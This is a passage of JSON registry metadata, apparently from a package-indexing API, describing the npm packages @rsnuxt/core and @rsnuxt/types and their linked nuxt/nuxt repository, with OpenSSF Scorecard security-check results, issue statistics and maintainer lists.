settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32304464,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-26T09:34:17.070Z","status":"ssl_error","status_checked_at":"2026-04-26T09:34:00.993Z","response_time":129,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:00.887Z","dependent_packages_count":0,"downloads":803,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.063441759567027,"dependent_packages_count":36.25204172285812,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.657741741212572},"purl":"pkg:npm/%40rsnuxt/core","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@rsnuxt/core","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@rsnuxt/core","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@rsnuxt/core/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-08T05:00:23.926Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":838,"past_year_pull_requests_count":1377,"past_year_avg_time_to_close_issue":720221.4700665189,"past_year_avg_time_to_close_pull_request":229718.65300285988,"past_year_issues_closed_count":451,"past_year_pull_requests_closed_count":1049,"past_year_pull_request_authors_count":127,"past_year_issue_authors_count":605,"past_year_avg_comments_per_issue":2.2386634844868736,"past_year_avg_comments_per_pull_request":3.3209876543209877,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":551,"past_year_merged_pull_requests_count":932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fcore/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fcore/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fcore/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fcore/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fcore/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fcore/codemeta","maintainers":[{"uuid":"vincent.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2025-02-11T09:42:17.225Z","updated_at":"2025-02-11T09:42:17.225Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11342489,"name":"@rsnuxt/types","ecosystem":"npm","description":"Nuxt types","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"rsnuxt","versions_count":12,"first_release_published_at":"2025-02-11T09:14:52.992Z","latest_release_published_at":"2025-08-27T08:43:35.773Z","latest_release_number":"0.5.5","last_synced_at":"2026-05-11T01:23:06.016Z","created_at":"2025-02-11T09:15:17.472Z","updated_at":"2026-05-11T01:23:06.017Z","registry_url":"https://www.npmjs.com/package/@rsnuxt/types","install_command":"npm install @rsnuxt/types","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.5.5"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:03.894Z","dependent_packages_count":0,"downloads":574,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.063441759567027,"dependent_packages_count":36.25204172285812,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.657741741212572},"purl":"pkg:npm/%40rsnuxt/types","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@rsnuxt/types","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@rsnuxt/types","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@rsnuxt/types/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.